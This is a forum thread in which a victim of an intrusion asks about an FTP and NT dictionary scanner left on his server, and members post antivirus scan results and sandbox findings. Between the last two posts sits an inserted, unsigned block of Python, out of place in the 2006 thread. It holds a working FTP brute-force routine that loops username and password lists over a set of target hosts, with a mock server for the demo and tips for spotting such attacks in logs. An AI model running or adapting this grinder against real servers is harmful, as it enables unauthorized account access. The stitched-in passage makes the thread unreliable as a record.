
Thread: FTP and NT Scanner by Lomax

  1. #1
    Junior Member
    Join Date
    May 2006
    Posts
    11

    Question FTP and NT Scanner by Lomax

    Does anyone know the details of how this program attempts to connect to a computer? Someone was able to access my terminal services server through a local account and upload this program. In reviewing security event logs, I see that they did attempt to gain access to my network but were apparently unable to do so. I ran the tool to see what information they were likely working with, and what I notice is that it doesn't seem to attempt domain logins, only local machine logins. I want to make sure I'm understanding the tool right so that I thoroughly examine the extent of their probable access.

  2. #2
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    No one here can put this puzzle together for you without:

    a) fully understanding your environment.
    b) analyzing all logs
    c) understanding your business process
    d) understanding what the software does that has compromised your host/network.

    That said, the only "Lomax" I'm familiar with is Paul Lomax, who writes books for O'Reilly.

    Can you provide a link to the software in question? At very least we can tell you what the software does and you can take it from there.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  3. #3
    Junior Member
    Join Date
    May 2006
    Posts
    11
    Thanks for responding TH13. I suppose I wasn't clear in my questions. I know how the attacker gained access to my terminal server, so I'm not so concerned about that part. He left the scanner I mentioned, though, and I was hoping someone knew the program and could give me more in-depth info on its workings.

    When I ran the tool (it's a CLI from a command prompt), it showed the name of the program as "FTP and NT Scanner by Lomax (credits Inode (inode@wayeth.eu.com))." You can go to the site and see that the author took his tools off the web because they were being used for cracking. The tool seems pretty simple in that it tries to connect to computers within a given ip range using a brute force method. There is a username file and password file that it uses for determining a working login. But it seems to only attempt to log on to a machine's local account and not the domain. I just figured someone in the antionline community would be familiar with the tool and could confirm my suspicions of the program's workings or learn more about its capabilities. No big deal if there is not, though, as I'm confident that I've plugged the weak spot that was used to compromise my system. Thanks anyways.

  4. #4
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    While I'm not familiar with this specific tool, I'm VERY familiar with others that do the same thing. It sounds from your description that this is a simple "grinder" tool. My guess is that it also uses that static PW list against the standard TCP port for FTP (21).

    Any chance you can zip up the tool and attach it here? If not, the size of the PW file alone will tell me how dangerous (or not) this is. Otherwise, I can arrange for upload out of band.

    Thanks.

  5. #5
    Junior Member
    Join Date
    May 2006
    Posts
    11
    Here's the tool. I'd say you're right about the way it works. What I'm not sure of is if it is just checking port 21 or any other ports (by default or by command). Take a look and let me know what you think.

  6. #6
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Well, this is possibly a start:

    Antivirus            Version         Update      Result
    AntiVir              6.35.0.21       07.09.2006  no virus found
    Authentium           4.93.8          07.07.2006  no virus found
    Avast                4.7.844.0       07.07.2006  no virus found
    AVG                  386             07.07.2006  no virus found
    BitDefender          7.2             07.09.2006  no virus found
    CAT-QuickHeal        8.00            07.07.2006  no virus found
    ClamAV               devel-20060426  07.07.2006  no virus found
    DrWeb                4.33            07.09.2006  no virus found
    eTrust-InoculateIT   23.72.64        07.09.2006  no virus found
    eTrust-Vet           12.6.2291       07.07.2006  no virus found
    Ewido                3.5             07.09.2006  no virus found
    Fortinet             2.77.0.0        07.09.2006  suspicious
    F-Prot               3.16f           07.07.2006  no virus found
    F-Prot4              4.2.1.29        07.07.2006  no virus found
    Ikarus               0.2.65.0        07.07.2006  no virus found
    Kaspersky            4.0.2.24        07.09.2006  no virus found
    McAfee               4802            07.07.2006  Tool-LoScan
    Microsoft            1.1481          07.09.2006  no virus found
    NOD32v2              1.1651          07.08.2006  no virus found
    Norman               5.90.23         07.07.2006  no virus found
    Panda                9.0.0.4         07.09.2006  no virus found
    Sophos               4.07.0          07.09.2006  no virus found
    Symantec             8.0             07.09.2006  no virus found
    TheHacker            5.9.8.170       07.07.2006  no virus found
    UNA                  1.83            07.08.2006  no virus found
    VBA32                3.11.0          07.09.2006  no virus found
    VirusBuster          4.3.7:9         07.08.2006  no virus found

    So Fortinet didn't like the look of it, and McAfee thinks that it is "Tool-LoScan". I would go to the McAfee site and check what they have about that in their malware library.

  7. #7
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    I will run this tool in a sandbox tomorrow when I get to the office. I will see if it does any sneaky backdoor stuff too. Stay tuned.

    Thanks.

    --TH13

  8. #8
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    It's probably based on the source found here (only available through Google cache, as the original site took it offline), modified to make it run on Windows (Cygwin). Looks like a plain FTP dictionary scanner. It probably uses the "users" file for usernames and "pass" for passwords.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  9. #9
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    Yep, after some testing this is a vanilla grinder app. It uses the dictionary that comes with it to grind FTP servers and Windows local accounts. No backdoors, etc.


    --TH13
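The behaviour the last few posts describe (a dictionary grinder that walks a list of hosts, tries every username from a "users" file with every password from a "pass" file against TCP port 21, and moves on when nothing answers), written out as an added Python example so the control-channel exchange is visible from both sides. This is not the Lomax tool's code and nothing in it was recovered from the attached binary: the mock FTP server, its single valid account and the two word lists are constructed for the demo, and the choices of one fresh connection per guess and an identical 331 reply for every USER are assumptions about typical server behaviour, not facts from the thread. Only the FTP side is modelled; the Windows local-account grinding TH13 mentions is a different protocol and is not covered here.

```python
import socket
import threading

# Constructed credential store for the mock server (a demo assumption, nothing recovered from the tool).
VALID_ACCOUNTS = {"ftpuser": "letmein"}

def _send(conn, code, text):
    conn.sendall(f"{code} {text}\r\n".encode())   # one single-line FTP reply

def _serve_one(conn):
    """Mock FTP control channel: 220 greeting, then only USER, PASS and QUIT."""
    user = None
    with conn, conn.makefile("rb") as rf:
        try:
            _send(conn, 220, "mock ftpd ready")
            for line in rf:                          # ends when the client disconnects
                verb, _, arg = line.decode(errors="replace").rstrip("\r\n").partition(" ")
                verb = verb.upper()
                if verb == "USER":
                    user = arg
                    _send(conn, 331, "Password required")   # same reply for any name: no username oracle
                elif verb == "PASS":
                    if user is not None and VALID_ACCOUNTS.get(user) == arg:
                        _send(conn, 230, "Login successful")
                    else:
                        _send(conn, 530, "Login incorrect")
                elif verb == "QUIT":
                    _send(conn, 221, "Goodbye")
                    return
        except OSError:                              # client went away mid-exchange
            return

def start_mock_ftpd():
    """Listen on an ephemeral loopback port; returns (listening socket, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:                          # listening socket closed by run_demo()
                return
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]

def _reply_code(sock):
    """Read one single-line reply and return its 3-digit code."""
    line = sock.makefile("rb").readline()
    if not line:
        raise ConnectionError("server closed the control channel")
    return line[:3].decode(errors="replace")

def try_login(host, port, user, password, timeout=3.0):
    """One guess on a fresh connection: USER, then PASS; True on 230."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if _reply_code(s) != "220":
            return False
        s.sendall(f"USER {user}\r\n".encode())
        if _reply_code(s) != "331":
            return False
        s.sendall(f"PASS {password}\r\n".encode())
        ok = _reply_code(s) == "230"
        s.sendall(b"QUIT\r\n")
        return ok

def grind(targets, users, passwords):
    """Every user x every password against every (host, port); returns (hits, attempts)."""
    hits, attempts = {}, 0
    for host, port in targets:
        ok = False
        for user in users:
            for pw in passwords:
                try:
                    ok = try_login(host, port, user, pw)
                except OSError:                      # nothing listening, or connection dropped
                    ok = None
                    break
                attempts += 1
                if ok:
                    hits[(host, port)] = (user, pw)
                    break
            if ok is None or ok:                     # dead host or hit: stop grinding this host
                break
    return hits, attempts

def run_demo():
    srv, port = start_mock_ftpd()
    try:
        targets = [("127.0.0.1", port), ("127.0.0.1", 1)]  # port 1: nothing listening there
        users = ["administrator", "ftpuser"]                # constructed "users" file
        passwords = ["password", "123456", "letmein"]       # constructed "pass" file
        return grind(targets, users, passwords)
    finally:
        srv.close()
```

`run_demo()` returns the working pair for the mock server and the number of PASS attempts it took (six with the lists above); the closed port costs no attempts because the connect fails and the grinder moves on. A fresh connection per guess is the realistic choice, since most FTP daemons drop the control channel after a few bad PASS commands, and it is also the defender's handle on this: every guess shows up as one short connection and one failed-login line in the FTP server's log, so a burst of them from a single source against port 21 is the pattern to search for when sizing up what the attacker reached.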

  10. #10
    Junior Member
    Join Date
    May 2006
    Posts
    11
    Thanks guys, I really appreciate it!
